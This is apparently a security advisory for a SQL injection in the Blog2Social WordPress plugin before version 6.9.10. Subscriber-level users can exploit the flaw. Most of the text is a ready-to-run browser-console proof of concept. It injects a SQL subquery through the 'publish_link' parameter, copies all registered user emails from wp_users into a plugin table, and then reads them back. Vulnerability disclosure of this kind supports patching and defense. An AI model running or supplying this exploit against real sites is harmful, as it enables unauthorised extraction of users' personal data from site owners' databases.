Blog2Social < 6.9.10 - Subscriber+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers

PoC

Run the script below in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social) to get all registered user emails via the SQL Injection // There need to be at least one post in the wp_b2s_posts table (if the table is empty, can simply create a dummy one directly in the DB) // The b2s_post_id variable below needs to be one from the wp_b2s_posts table // The current_user_id does not need to be the owner of the post // Change ME! current_user_id = 21; wp_site_ajax_url = ‘https://example.com/wp-admin/admin-ajax.php’; b2s_post_id = 1; // Don’t edit below // First request to read data from any SQL table as a subquery and write to wp_b2s_posts data1 = new FormData(); data1.append(‘action’, ‘b2s_update_approve_post’); data1.append(‘post_id’, b2s_post_id); data1.append(‘publish_link’, “',publish_link=(SELECT//CONCAT(‘DATA_KEY=’,group_concat(user_email//separator//‘;’))//FROM//wp_users),publish_error_code=‘’,post_id=1337,blog_user_id=" + current_user_id + "//WHERE/**/id=1#”); data1.append(‘publish_error_code’, ‘’); data1.append(‘b2s_security_nonce’, jQuery(‘#b2s_security_nonce’).val()); fetch(wp_site_ajax_url, { method: “POST”, credentials: ‘same-origin’, body: data1 }); // Second request to fetch the data from wp_b2s_posts data2 = new FormData(); data2.append(‘action’, ‘b2s_publish_post_data’); data2.append(‘postId’, 1337); data2.append(‘b2s_security_nonce’, jQuery(‘#b2s_security_nonce’).val()); fetch(wp_site_ajax_url, { method: “POST”, credentials: ‘same-origin’, body: data2 }).then(response => response.json()) .then(data => { const found = data.content.match(/DATA_KEY=[^>]*>/g); console.log(found); });